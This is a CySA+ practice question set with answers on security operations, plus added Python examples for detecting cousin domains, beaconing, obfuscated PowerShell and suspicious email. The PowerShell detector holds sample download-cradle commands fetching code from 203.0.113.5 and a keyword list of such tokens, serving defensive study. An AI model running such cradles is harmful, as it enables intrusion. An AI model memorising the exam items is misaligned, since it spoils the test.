CySA+ Modules


A security analyst notices anomalous network activity on a system. A user's computer is communicating with a command and control (C2) server. Which of the following concepts are relevant to the security analyst's investigation into the compromised system? (Select the two best options.) A. Beaconing B. Malicious processes C. Malware installation D. Data encryption

A. Beaconing B. Malicious processes A compromised system sends a beacon signal to a C2 server to signal its availability or receive new commands. The security analyst needs to identify the specific malicious processes running on the system to determine the extent of the compromise and the actions the analyst must take to remediate the situation.

Which of the following operations is characteristic of cyber criminal activity? A. Targeting multiple pharmaceutical companies with a financial fraud scheme B. Stealing information about planned U.S. troop deployments C. Releasing embarrassing personal information about the heads of several non-governmental organizations D. Defacing the website of a prominent international oil company

A. Targeting multiple pharmaceutical companies with a financial fraud scheme Organized crime describes a category of malicious activity characterized by the desire to generate illicit profit. Frequently, the activity involves financial fraud and blackmail and normally targets companies and private citizens.

An analyst identifies a script on a compromised workstation. The analyst determines that the author has used meaningful opening and closing tags to identify data types. What scripting language is the analyst examining? A. XML B. HTML C. PowerShell D. OSINT

A. XML eXtensible Markup Language (XML) is a text-based markup language (not a scripting language) for describing, storing, and transferring data. An important differentiator of XML is that the language does not define the data tags; authors define their own tags, which is why meaningful opening and closing tags identify the data types.

What is the main benefit of using software-defined networking (SDN) in a virtualized environment? A. Increased network security B. Increased ease of management C. Improved network performance D. Reduced hardware costs

B. Increased ease of management SDN allows for increased ease of management in a virtualized environment and separates the control and data planes of traditional network devices enabling the centralization and programmability of network management functions. This centralized approach to network management allows for greater control over network resources and provides a more dynamic and scalable environment.

An organization's network defense team leverages a variety of offensive techniques as defensive measures to stop active attacks while continuing to gain an understanding of adversary behavior. What type of network defense are they engaging in? A. IoCs B. Threat hunting C. Active defense D. Risk management

C. Active defense Active defense describes the adaptation of offensive techniques for network defense purposes. Honeypots are an example of active defense.

A user alerts the incident response team to an email that comes from a domain very similar to the company's legitimate domain. What appears to have been used in this attempted impersonation? A. Reverse shell B. Single pane of glass C. Webhook D. Cousin domain

D. Cousin domain A cousin domain is a registered domain that closely resembles a legitimate one so that recipients misread it. For example, "examp1e.com" (digit one in place of the letter l), "example-invoices.com", or "example.trainingteam.com" could all be used to impersonate "example.com". Defenders catch many of them by comparing sender domains against the legitimate domain with homoglyph and edit-distance checks, and by registering the obvious look-alikes themselves.
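
One way to screen inbound sender domains for this kind of look-alike, as an added example that is not part of the original page: example.com stands in for the company's real domain, the homoglyph table is a small constructed subset, and the "registrable domain" helper assumes a plain two-label domain (no public-suffix list is consulted).

```python
"""Classify a sender domain as legitimate, a subdomain, a cousin (look-alike), or unrelated.

Added example, not from the original page. example.com stands in for the
company's real domain; the substitution table is a small, constructed subset.
"""

# Digits attackers swap for look-alike letters. Constructed subset; a production
# list would also cover Unicode confusables (IDN homographs).
DIGIT_SWAPS = str.maketrans("013578", "olestb")


def normalize(domain):
    """Fold common homoglyph tricks so examp1e.com and exarnple.com read as example.com."""
    d = domain.lower().strip(".")
    d = d.replace("rn", "m").replace("vv", "w")
    return d.translate(DIGIT_SWAPS)


def registrable(domain):
    """Last two labels, e.g. trainingteam.com. Assumption: no public-suffix list,
    so two-level TLDs such as co.uk are not handled."""
    return ".".join(domain.split(".")[-2:])


def levenshtein(a, b):
    """Edit distance between two strings (insertions, deletions, substitutions)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(sender_domain, legit="example.com", max_distance=2):
    """Return 'legitimate', 'subdomain', 'cousin', or 'unrelated' for sender_domain."""
    raw = sender_domain.lower().strip(".")
    legit = legit.lower()
    if raw == legit:
        return "legitimate"
    if raw.endswith("." + legit):
        return "subdomain"          # mail.example.com: under the real registrable domain
    norm = normalize(raw)
    norm_reg = registrable(norm)
    legit_label = legit.split(".")[0]
    if levenshtein(norm_reg, legit) <= max_distance:
        return "cousin"             # examp1e.com, exarnple.com, exampel.com
    if legit_label in norm.split(".") or legit_label in norm_reg:
        return "cousin"             # example.trainingteam.com, example-login.com
    return "unrelated"


if __name__ == "__main__":
    for d in ["example.com", "mail.example.com", "examp1e.com", "exarnple.com",
              "example-login.com", "example.trainingteam.com", "github.com"]:
        print(f"{d:28} {classify(d)}")
```

The raw string is compared first so that a genuine subdomain is never mistaken for a cousin; only after that are homoglyphs folded and distances measured. Tune max_distance to the length of the real domain: a threshold of 2 is generous for a short name and too loose for a long one.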

The system administrator of a large organization notices abnormal account activity and a high volume of outbound traffic to a suspicious IP address from a client machine. Which of the following best describes the abnormal account activity in this scenario? A. The use of weak passwords and poor authentication mechanisms B. The use of administrator-level accounts C. A user accessing multiple resources in a short period of time D. Unusual user account behavior, such as logging in at unusual times or from unusual locations

D. Unusual user account behavior, such as logging in at unusual times or from unusual locations The abnormal activity may involve changes in login times, accessing files or systems not typically accessed, or altering security settings.

A security analyst notices that the processor consumption on the organization's server is much higher than usual. After investigating, a process named "malware.exe" was found running in the background. Which of the following best describes the relationship between processor consumption and malicious processes in this scenario? A. Malicious processes can cause high processor consumption. B. High processor consumption always indicates the presence of malicious processes. C. Low processor consumption always indicates the absence of malicious processes. D. Malicious processes have no impact on processor consumption.

A. Malicious processes can cause high processor consumption. A system infected with malware may execute malicious processes that can consume a significant amount of processing power. High processor consumption is often an indicator of malicious processes actively running on a system. Therefore, identifying and stopping such processes is crucial to preventing further damage and ensuring the security of the system.

A security organization is concerned about employees connecting rogue equipment to the network. What could they use to identify rogue devices? A. Use a map scan B. Create a honeypot C. Consult paid feeds D. Take memory dumps

A. Use a map scan A map scan, also known as a discovery scan or network mapping scan (an Nmap host discovery sweep is the usual tool), enumerates the devices responding on a network. Comparing the results with the asset inventory reveals devices that should not be there, which is why security teams run these scans to find rogue equipment.

A security analyst is looking for the appropriate tools to detect and analyze malware in the organization's network. What tools allow the analyst to detect and analyze malware through virtualized environments? (Select the two best options.) A. Cuckoo Sandbox B. Joe Sandbox C. VirusTotal D. Snort

A. Cuckoo Sandbox B. Joe Sandbox Cuckoo Sandbox is a powerful open-source malware analysis system that automatically analyzes and detects malicious files and URLs in a virtualized environment. Joe Sandbox is a commercial malware analysis system that offers advanced malware analysis capabilities such as code analysis, behavior analysis, and memory analysis in a virtualized environment.

Which of the following logging levels is the highest and most verbose level of logging in Windows Event Viewer? A. Debug B. Warning C. Information D. Error

A. Debug Of the options listed, Debug is the most verbose level: it emits detailed information about a software application's or system process's internal operation for troubleshooting. Note that Windows Event Viewer itself labels this level Verbose (its levels are Critical, Error, Warning, Information, and Verbose); Debug is the equivalent term used by syslog and most application logging frameworks.

A threat hunter is searching for malicious activity on a corporate network. Which of the following might they use to guide their efforts? (Select the two best options.) A. Log files B. Memory dumps C. IoCs D. IoAs

C. IoCs D. IoAs Indicators of compromise (IoCs) suggest a compromise may have occurred, such as communications with a malicious domain or IP, suspicious network traffic, or unusual privileged account activity. Identification of an IoC warrants additional investigation. Indicators of attack (IoAs) identify an ongoing attack. These sometimes include specific network traffic, user account creation, and particular log activity.

A security analyst monitoring a network for any irregularities notices a significant increase in beaconing and irregular peer-to-peer communication on one of the company's servers. Which of the following best describes the potential threat of this situation? A. Malware propagation and system compromise B. Data exfiltration and infiltration C. Phishing and spear-phishing attacks D. Privilege escalation and credential theft

A. Malware propagation and system compromise Beaconing is a repeated, typically periodic, communication pattern in which a device sends signals to a command and control (C&C) server to check in and receive instructions. Irregular peer-to-peer communication is traffic between two hosts that are not normally in direct contact, and it can indicate lateral movement of malware between endpoints.
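
Both this question and the C2 beaconing question above turn on the same observable: a host contacting the same destination at nearly constant intervals. The script below is an added example and not part of the original quiz material. It reads a constructed connection log in a "timestamp source destination port" layout (an assumption, not a real capture format), groups connections by flow, and flags flows whose inter-connection gaps vary little. Real implants add random sleep and jitter, so treat a low-jitter flow as a lead to investigate rather than proof of compromise.

```python
"""Flag periodic, beacon-like connections in a connection log.

Added example, not from the original page. The log below is a constructed
"timestamp source destination dport" layout, not a real capture.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample: 10.0.0.5 contacts 203.0.113.10:443 roughly every 60 s with
# only a second or two of jitter (beacon-like); 10.0.0.7 browses irregularly.
SAMPLE_LOG = """\
1700000000.0 10.0.0.5 203.0.113.10 443
1700000061.2 10.0.0.5 203.0.113.10 443
1700000119.8 10.0.0.5 203.0.113.10 443
1700000180.5 10.0.0.5 203.0.113.10 443
1700000240.1 10.0.0.5 203.0.113.10 443
1700000301.0 10.0.0.5 203.0.113.10 443
1700000003.0 10.0.0.7 198.51.100.20 443
1700000015.0 10.0.0.7 198.51.100.20 443
1700000250.0 10.0.0.7 198.51.100.20 443
1700000260.0 10.0.0.7 198.51.100.20 443
1700000900.0 10.0.0.7 198.51.100.20 443
1700001000.0 10.0.0.7 198.51.100.20 443
"""


def parse_log(text):
    """Group connection timestamps by (src, dst, dport)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        flows[(src, dst, int(dport))].append(float(ts))
    return flows


def periodicity(timestamps):
    """Return (mean_gap, jitter) for a flow, or None if too few connections.

    jitter is the coefficient of variation of the inter-arrival gaps
    (stdev / mean); values near 0 mean the gaps are almost identical.
    """
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if len(gaps) < 3:
        return None
    avg = mean(gaps)
    if avg <= 0:
        return None
    return avg, pstdev(gaps) / avg


def find_beacons(text, min_connections=5, max_jitter=0.15):
    """Return [((src, dst, dport), mean_gap, jitter)] for low-jitter flows."""
    hits = []
    for key, ts in parse_log(text).items():
        if len(ts) < min_connections:
            continue
        result = periodicity(ts)
        if result is None:
            continue
        avg, jitter = result
        if jitter <= max_jitter:
            hits.append((key, round(avg, 1), round(jitter, 3)))
    return hits


if __name__ == "__main__":
    for (src, dst, dport), avg, jitter in find_beacons(SAMPLE_LOG):
        print(f"{src} -> {dst}:{dport} every ~{avg}s (jitter {jitter})")
```

In practice the jitter threshold is combined with other signals (a destination few other hosts talk to, a small and constant payload size, traffic outside business hours) before an alert is raised.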

Which of the following is a common method for protecting cardholder data and PII? A. Default system configurations B. Encryption technology C. Single-factor authentication D. Data retention policies

B. Encryption technology Encryption technology protects sensitive information such as cardholder data and personally identifiable information (PII). It is crucial to implement appropriate security measures to safeguard sensitive information through data encryption, access control, and security awareness training for employees.

Which of the following is a potential security risk associated with implementing a single sign-on (SSO) solution in a security operations environment? A. Increased complexity of authentication process B. Increased risk of phishing attacks C. Incompatibility with multi-factor authentication (MFA) D. Greater reliance on physical devices for authentication

B. Increased risk of phishing attacks SSO can be convenient for users and help improve productivity, but it can also make it easier for attackers to gain access to multiple systems or applications if they can successfully steal or phish a single set of login credentials.

A security analyst for a corporation notices abnormal OS process behavior and unauthorized changes in the network environment. The analyst reviews the logs and identifies suspicious activities on a server. The analyst could have implemented which security operations practice to prevent the incident from happening in the first place? A. Incident response procedures to quickly detect and respond to security incidents B. Regular vulnerability assessments to identify and remediate vulnerabilities before attackers can exploit them C. User access control policies to limit access to sensitive systems and data D. Regular system backups to quickly restore systems and data in the event of a compromise

B. Regular vulnerability assessments to identify and remediate vulnerabilities before attackers can exploit them The analyst should conduct regular vulnerability assessments to identify and remediate vulnerabilities before attackers can exploit them. When the analyst can identify and remediate vulnerabilities, attackers will have more difficulty exploiting systems and software.

A company's security operations center has implemented a data loss prevention (DLP) solution to monitor and prevent sensitive data from being transmitted outside the organization. The security team also maintains strict controls over cardholder data (CHD) and personally identifiable information (PII) to comply with industry regulations and protect customer privacy. Which of the following is a potential benefit of implementing a DLP solution in a security operations environment? A. A DLP solution can provide physical security for servers and network devices, protecting against theft or damage. B. A DLP solution can automatically detect and remediate vulnerabilities in software and hardware components. C. A DLP solution can help prevent sensitive data from being transmitted outside the organization, reducing the risk of data breaches and compliance violations. D. A DLP solution can provide real-time threat intel

C. A DLP solution can help prevent sensitive data from being transmitted outside the organization, reducing the risk of data breaches and compliance violations. DLP can help identify and prevent unauthorized access, transmission, and storage of sensitive data such as cardholder data and personally identifiable information.

A security analyst analyzes application logs to identify any suspicious activities and notices that one of the company's recently resigned employees had downloaded a large amount of data just before leaving. What is the analyst's most appropriate next step based on the scenario? A. Block the former employee's access to the company's server to prevent further data exfiltration B. Notify the authorities and report the incident to prevent further data theft C. Check the company's firewall logs to identify any external connections made by the former employee D. Review the network's DNS logs to identify any unusual connections to external domains

C. Check the company's firewall logs to identify any external connections made by the former employee Checking the company's firewall logs will help the analyst identify any external connections made by the former employee, which can indicate whether the former employee has shared company data with external parties.

A threat hunter is searching for malicious activity with information derived from the research of a third-party commercial entity. What kind of information is the threat hunter likely using? A. Internal sources B. OSINT C. Paid feed D. ISACs

C. Paid feed A paid feed, also referred to as a commercial feed, is a source of cyber threat intelligence developed using the research and analysis of a private commercial entity.

A security analyst is developing a Python script to analyze regular text from log files. The script will identify potential security incidents and generate alerts for further investigation. Which of the following best describes the security concept the analyst needs to implement in the Python script to detect obfuscated text? (Select the two best options.) A. Polymorphic code B. Cryptography C. Regular expression D. String manipulation

C. Regular expression D. String manipulation The analyst can use regular expressions to detect patterns in text, which helps identify potential security incidents. String manipulation (slicing, decoding, joining, substituting) lets the script transform obfuscated text back into a form the patterns can match.
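
The following added example (not from the original page) shows both concepts against a common case of obfuscated text: PowerShell launched with a base64-encoded command. The log lines are constructed in an assumed "timestamp host command_line" layout; the encoded sample is built at run time so that it round-trips correctly.

```python
"""Spot encoded or obfuscated PowerShell in process command lines.

Added example, not from the original page. Log lines are constructed; the
field layout "timestamp host command_line" is an assumption.
"""
import base64
import re


def encode_powershell(command):
    """Build the -EncodedCommand form PowerShell expects: base64 of UTF-16LE text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64):
    """Inverse of encode_powershell; raises ValueError/UnicodeDecodeError on junk."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)-e(?:ncodedcommand|ncodedc|ncoded|ncode|ncod|nco|nc|n|c)?\s+([A-Za-z0-9+/=]{16,})"
)
# Tokens that are rare in benign admin scripts but common in download cradles.
SUSPICIOUS = re.compile(
    r"(?i)\b(?:IEX|Invoke-Expression|DownloadString|DownloadFile|FromBase64String|"
    r"Invoke-WebRequest|Net\.WebClient)\b"
)

SAMPLE_LOG = [
    # 1: encoded download cradle
    "2024-05-01T10:00:01Z ws01 powershell.exe -NoP -W Hidden -enc "
    + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')"),
    # 2: same cradle, obfuscated with a backtick and string concatenation
    "2024-05-01T10:00:02Z ws02 powershell.exe -c \"I`EX (New-Object Net.WebClient)"
    ".('Down'+'loadString')('http://203.0.113.5/b')\"",
    # 3: benign scheduled backup
    "2024-05-01T10:00:03Z ws03 powershell.exe -File C:\\Scripts\\backup.ps1",
]


def deobfuscate(text):
    """String manipulation step: strip backtick escapes and rejoin split literals."""
    return text.replace("`", "").replace("'+'", "").replace('"+"', "")


def analyze(line):
    """Return (decoded_payload_or_None, [findings]) for one log line."""
    findings = []
    decoded = None
    m = ENC_FLAG.search(line)
    if m:
        try:
            decoded = decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            findings.append("undecodable -EncodedCommand payload")
    # Swap the base64 blob for its plaintext, then normalise before pattern matching.
    scan_text = deobfuscate(line if decoded is None else line.replace(m.group(1), decoded))
    for token in sorted(set(t.lower() for t in SUSPICIOUS.findall(scan_text))):
        findings.append(f"suspicious token: {token}")
    return decoded, findings


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        decoded, findings = analyze(entry)
        print(entry[:60], "...", findings, decoded)
```

Matching the keyword list against the raw line alone would miss the first two samples entirely; it is the decoding and the backtick/concatenation clean-up that exposes them. The keyword list is a starting point, not a complete detection.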

A cybersecurity analyst is investigating a potential phishing attack against one of their clients and finds an email with an attachment and a long string of characters the analyst does not recognize. What is this long string of characters? A. A public key B. A private key C. An encrypted password D. A hash value

D. A hash value Hashing transforms data of any size into a fixed-length string of characters (the digest) that represents the original data. Any change to the input produces a different digest, so a hash verifies the integrity of the data; an analyst can recompute the attachment's hash and compare it with a known-good value or look it up in a threat-intelligence service.

Which of the following provides cybersecurity information and services to the owners and operators of critical infrastructure? A. OSINT B. CSIRT C. Threat hunting D. ISACs

D. ISACs Information Sharing and Analysis Centers (ISACs) provide cybersecurity information and services to the owners and operators of critical infrastructure. They are a forum for exchanging information between the public and private sectors to ensure the protection of vital assets.

A security analyst responsible for carrying out security operations on a company's network has received reports of certain users experiencing issues with their device's slow performance and high memory consumption. Which of the options is a probable cause of the high memory usage and slow performance? A. Running multiple applications at the same time B. Running outdated operating system software C. Having insufficient disk space on the device D. Installing software from unverified sources

D. Installing software from unverified sources Installing software from unverified sources can introduce malware or other harmful programs that consume significant system resources, leading to users experiencing issues with their device's slow performance and high memory consumption.

A company has recently upgraded to the latest version of the web application. During a review of the logs, the security analyst notices an unauthorized change made to the web application by an unknown user. Which of the following logs would most likely provide information about the unauthorized change? A. System log B. Event log C. Application log D. Security log

C. Application log The application log provides information about the application's internal functions and operations, including any unauthorized changes.

What do serverless, cloud, hybrid, and on-premises environments all use in security operations? (Select the three best options.) A. Access control mechanisms B. Security frameworks C. Incident response procedures D. Reduced attack surface

A. Access control mechanisms B. Security frameworks C. Incident response procedures Serverless, cloud, hybrid, and on-premises environments all need access control mechanisms to restrict unauthorized access to any sensitive data or systems. Security frameworks will provide a structured approach to security risk management. Developing incident response procedures is crucial for effectively managing security incidents to minimize damages and potential risks.

A security analyst notices abnormal account activity in the company's system. Someone accessed the system with the CEO's credentials at 2:00 am from a location 500 miles away from the CEO's usual location. The analyst tracks the IP address, GPS address, and device that accessed the system. Which security operation technique did the analyst use to determine the location and device of the user who accessed the system? A. Digital forensics B. Log analysis C. Alert triage D. Threat hunting

A. Digital forensics The security analyst tracked the GPS location, IP address, and device the attacker used to determine their location, which is an example of using digital forensics to investigate the incident.

An organization considers increasing threat intelligence sharing. Which parts of the organization are likely to experience direct benefits from this increased intelligence sharing? (Select the three best options.) A. Incident response B. The general counsel C. Risk management D. Security engineering

A. Incident response C. Risk management D. Security engineering Incident responders can benefit from the sharing of tactics, techniques, and procedures (TTPs) and can learn valuable lessons from the experiences of other incident response teams. Risk management is a program designed to identify risks and develop strategies to minimize their impact on an organization. Threat intelligence helps organizations make more informed risk decisions. Security engineers can adapt their security solutions to new and innovative TTPs used by malicious actors, increasing their effectiveness against the types of techniques attackers use.

A project manager needs to verify users and authorize access to systems and applications. Which security control should the project manager implement? A. Multi-factor authentication B. Firewall C. Access control list D. Password manager

A. Multi-factor authentication Implementing multi-factor authentication (MFA) is the most appropriate security control to ensure user authentication and authorization for accessing required systems and applications. MFA uses multiple authentication methods such as passwords, biometrics, or token-based authentication to enable only authorized users to access the systems and applications.

An analyst needs to use Nmap to identify workstations with a specific service running on port 8080. What type of script would be best for automating this task? A. Shell script B. XML C. APT D. CSIRT

A. Shell script Shell scripts are well suited to chaining command-line tools: a short script can run the Nmap scan, filter the hosts that report 8080/open, and write the result to a file or feed it to the next step. They are also commonly used to automate software updates and assist with log review.
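
The task in this question automated in Python, as an added example that is not from the original page: it builds the Nmap command line and parses Nmap's grepable (-oG) output. The target range and the sample output are constructed so the parser can be exercised without running a scan; scan() runs the real thing only when nmap is installed and the analyst is authorized to scan the range.

```python
"""Automate an Nmap check for hosts exposing TCP 8080 and parse the result.

Added example, not from the original page. The target range is an assumption,
and the grepable (-oG) output below is constructed so the parser runs offline.
"""
import re
import subprocess

TARGET = "10.0.0.0/24"   # assumption: the workstation subnet
PORT = 8080


def nmap_command(target, port):
    """Command line the wrapper would run; '-oG -' prints grepable output to stdout."""
    return ["nmap", "-Pn", "-p", str(port), "-oG", "-", target]


# Constructed sample of what 'nmap -Pn -p 8080 -oG - 10.0.0.0/24' prints.
SAMPLE_GREPABLE = """\
# Nmap 7.94 scan initiated as: nmap -Pn -p 8080 -oG - 10.0.0.0/24
Host: 10.0.0.5 (ws05.corp.example)\tStatus: Up
Host: 10.0.0.5 (ws05.corp.example)\tPorts: 8080/open/tcp//http-proxy///
Host: 10.0.0.9 ()\tPorts: 8080/filtered/tcp//http-proxy///
Host: 10.0.0.12 (ws12.corp.example)\tPorts: 8080/open/tcp//http-proxy///
# Nmap done -- 256 IP addresses (3 hosts up) scanned
"""

HOST_LINE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s+Ports:\s+(.*)$")


def parse_grepable(text, port):
    """Return [(ip, hostname_or_None, service_or_None)] for hosts with port open."""
    results = []
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if not m:
            continue
        ip, hostname, ports = m.groups()
        for entry in ports.split(","):
            # Each entry: port/state/protocol/owner/service/rpc/version
            fields = entry.strip().split("/")
            if (len(fields) >= 5 and fields[0] == str(port)
                    and fields[1] == "open" and fields[2] == "tcp"):
                results.append((ip, hostname or None, fields[4] or None))
    return results


def scan(target=TARGET, port=PORT):
    """Run the real scan (needs nmap on PATH and permission to scan the range)."""
    proc = subprocess.run(nmap_command(target, port), capture_output=True, text=True, check=True)
    return parse_grepable(proc.stdout, port)


if __name__ == "__main__":
    for ip, host, svc in parse_grepable(SAMPLE_GREPABLE, PORT):
        print(f"{ip} ({host or 'no PTR'}) {PORT}/tcp open {svc or ''}")
```

Filtering on the state field matters: a host that answers "filtered" on 8080 is not running the service, it just has a firewall in the way, and including it would send the analyst chasing the wrong workstations.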

A security analyst for a large financial institution investigates a suspicious IP address that their security system flagged. The analyst finds two useful resources, WHOIS and AbuseIPDB. Which of the following best describes the role of WHOIS and AbuseIPDB in security operations? A. WHOIS and AbuseIPDB identify the source of suspicious network traffic. B. WHOIS and AbuseIPDB block malicious traffic from entering a network. C. WHOIS and AbuseIPDB encrypt sensitive data to prevent unauthorized access. D. WHOIS and AbuseIPDB monitor the network for potential vulnerabilities.

A. WHOIS and AbuseIPDB identify the source of suspicious network traffic. WHOIS is a publicly available database that provides information about the owners of registered domain names, IP addresses, and autonomous system numbers. AbuseIPDB is a community-driven project that collects and shares data about IP addresses reported for abusive behavior.

Which of the following is an example of cardholder data (CHD)? A. A customer's name and email address B. A customer's credit card number and expiration date C. A customer's social security number D. A customer's mother's maiden name

B. A customer's credit card number and expiration date Personally identifiable information (PII) related to credit cards or payment cards is cardholder data. It includes sensitive information such as card numbers, expiration dates, and security codes. It is important to ensure that any system that handles cardholder data is secure to prevent data breaches and protect the privacy of customers.

Network defenders realize they are learning valuable information about attackers each time a host is compromised. They want to preserve the ability to gain these insights without risking sensitive information. What tool or technique could the network defenders implement to accomplish this goal? A. Threat hunting B. A honeypot C. A SIEM D. Paid threat feeds

B. A honeypot A honeypot is a fake file, host, or network designed to lure an attacker away from legitimate network assets and information. An organization can steer an attacker toward these fake resources to watch how they operate without exposing valuable resources.

A security analyst at a large financial institution monitors the network for any suspicious activity and finds a log file that appears to have been tampered with. Using the strings command in Python, what will the analyst be able to extract? A. Only strings that are visible to the user B. Both strings and binary data C. Only binary data D. Only numerical data

B. Both strings and binary data strings is a Unix utility (reimplemented in many Python forensic tools, but not a Python command itself) that scans a binary file and prints the runs of printable characters it contains. Running it over executables or a suspect log file pulls human-readable text such as URLs, file paths, and command lines out of otherwise binary data.
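
What strings actually does is easy to reproduce, and doing so in Python shows what the answer means by "both strings and binary data". The block below is an added example, not code from the original page; the byte blob is constructed to contain an ASCII URL, a UTF-16LE registry path (the encoding Windows binaries commonly use), and a command line between runs of non-printable bytes.

```python
"""A minimal 'strings' in Python: pull printable ASCII and UTF-16LE runs out of bytes.

Added example, not from the original page. The binary blob is constructed.
"""
import re

# Constructed blob: a fake header, an ASCII URL, junk, a UTF-16LE registry path
# (the encoding Windows binaries commonly use), junk, and an ASCII command line.
SAMPLE_BLOB = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    + b"http://203.0.113.5/update.bin"
    + b"\x00\xff\xfe\x01"
    + "Software\\Microsoft\\Windows\\CurrentVersion\\Run".encode("utf-16-le")
    + b"\x00\x00ab\x01\x02"
    + b"cmd.exe /c whoami\x00"
)


def strings(data, min_len=4):
    """Return [(offset, encoding, text)] sorted by offset (decimal offsets, as strings -t d)."""
    ascii_run = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    # UTF-16LE text is a printable byte followed by a null byte, repeated.
    utf16_run = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    hits = [(m.start(), "ascii", m.group().decode("ascii"))
            for m in ascii_run.finditer(data)]
    hits += [(m.start(), "utf-16le", m.group().decode("utf-16-le"))
             for m in utf16_run.finditer(data)]
    return sorted(hits)


if __name__ == "__main__":
    for offset, enc, text in strings(SAMPLE_BLOB):
        print(f"{offset:6d} {enc:8} {text}")
```

A plain ASCII scan alone would never show the registry path, because every other byte of UTF-16LE text is a null; that is why strings on Windows samples is normally run with the little-endian 16-bit option as well.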

A threat-hunting team is looking for unusual traffic and anomalous attempts to access the company's essential servers, databases, and applications. This is an example of what focus area? A. Misconfiguration hunting B. Business-critical asset hunting C. Isolated network hunting D. Indicators of compromise hunting

B. Business-critical asset hunting Business-critical asset hunting is when an organization identifies its business-critical systems and conducts a threat hunt designed to uncover unusual traffic and anomalous attempts to access those systems.

A security analyst discovers that an attacker is attempting to launch a distributed denial-of-service (DDoS) attack on the company's network. What action should the security analyst take to prevent the DDoS attack from succeeding? A. Implement a firewall to block traffic from the attacker's IP address B. Configure the router to limit the amount of traffic coming from the attacker's IP address C. Add more bandwidth to the server to handle the increased traffic D. Shut down the server until the attacker is identified

B. Configure the router to limit the amount of traffic coming from the attacker's IP address The security analyst should configure the router to rate-limit traffic from the attacking address, which stops a single source from overwhelming the company's server. For a genuinely distributed attack, per-address limits do not scale; the organization would need upstream filtering, a scrubbing service, or a CDN in front of the server.

A cybersecurity analyst develops a new security protocol that utilizes hashing and headers to enhance the security of the company's data transmissions. Which of the following correctly explains the role of hashing and headers in enhancing security operations? A. Hashing and headers encrypt data transmissions. B. Hashing generates unique digital representations of data, while headers add metadata to a message or data packet. C. Hashing and headers decrypt data transmissions. D. Hashing and headers are not related to enhancing security operations; they only format and organize data.

B. Hashing generates unique digital representations of data, while headers add metadata to a message or data packet. Hashing generates a fixed-length, one-way (irreversible) digest that uniquely represents the data for practical purposes. Headers are pieces of metadata attached to a message or data packet, such as sender and recipient, data type, and other parameters that help route and manage the transmission.
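
The two concepts here, and the hash value in the phishing-attachment question above, come together when triaging a suspicious email. The block below is an added example and not part of the original page: the message is constructed, the attachment is a 27-byte fake PDF, and the header checks (From versus Return-Path, and the host named in the Received line) are heuristics that assume a single-hop message.

```python
"""Fingerprint an attachment and check the routing metadata of a suspicious email.

Added example, not from the original page. The message is constructed, and the
attachment is a 27-byte fake PDF rather than real malware.
"""
import hashlib
import re
from email import message_from_string
from email.utils import parseaddr

SAMPLE_EMAIL = """\
Return-Path: <billing@examp1e-invoices.com>
Received: from mail.examp1e-invoices.com (203.0.113.7) by mx.example.com; Wed, 1 May 2024 10:00:00 +0000
From: "Example Billing" <billing@example.com>
To: user@example.com
Subject: Invoice overdue
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please see the attached invoice.
--b1
Content-Type: application/octet-stream; name="invoice.pdf"
Content-Disposition: attachment; filename="invoice.pdf"
Content-Transfer-Encoding: base64

JVBERi0xLjQKJWZha2UgcGRmIGZvciBkZW1v
--b1--
"""


def sha256_hex(data):
    """Fixed-length digest: any change to the input yields a different value."""
    return hashlib.sha256(data).hexdigest()


def domain_of(address):
    """Lower-cased domain part of an address such as '"Name" <user@Host.com>'."""
    return parseaddr(address)[1].rpartition("@")[2].lower()


def header_findings(msg):
    """Compare the visible From domain with Return-Path and the Received hop(s)."""
    findings = []
    from_dom = domain_of(msg.get("From", ""))
    rp_dom = domain_of(msg.get("Return-Path", ""))
    if from_dom and rp_dom and from_dom != rp_dom:
        findings.append(f"From domain {from_dom} differs from Return-Path domain {rp_dom}")
    for hop in msg.get_all("Received", []):
        m = re.match(r"\s*from\s+(\S+)", hop, re.I)
        if not (m and from_dom):
            continue
        host = m.group(1).lower()
        if not (host == from_dom or host.endswith("." + from_dom)):
            findings.append(f"Received from {m.group(1)}, not a {from_dom} host")
    return findings


def attachment_report(msg):
    """Name, size, SHA-256 and leading bytes of every attachment."""
    report = []
    for part in msg.walk():
        if part.get_content_disposition() != "attachment":
            continue
        data = part.get_payload(decode=True)
        report.append({"name": part.get_filename(), "size": len(data),
                       "sha256": sha256_hex(data), "magic": data[:4]})
    return report


def triage(raw_email):
    msg = message_from_string(raw_email)
    return {"headers": header_findings(msg), "attachments": attachment_report(msg)}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_EMAIL).items():
        print(key, value)
```

The digest is what gets shared or looked up; the raw attachment should never be opened on the analyst's workstation. The leading bytes ("magic") are kept because a file named .pdf whose content does not start with %PDF is itself a finding.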

During a log review, an incident responder discovers that a network administrator sent a sensitive file containing company financial data to their personal email account on the same day they resigned. This is likely an example of what? A. Unintentional insider B. Intentional insider C. Script kiddie D. OSINT collection

B. Intentional insider An intentional insider is a trusted individual who knowingly and intentionally conducts or facilitates malicious activity against an organization.

Which of the following options describe the benefits of reducing the attack surface and limiting access to sensitive resources? (Select the two best options.) A. It allows for greater transparency in network operations. B. It enhances the ability to detect and respond to anomalous activity. C. It helps to reduce the risk of unauthorized access to sensitive data. D. It promotes an increase in the availability of resources.

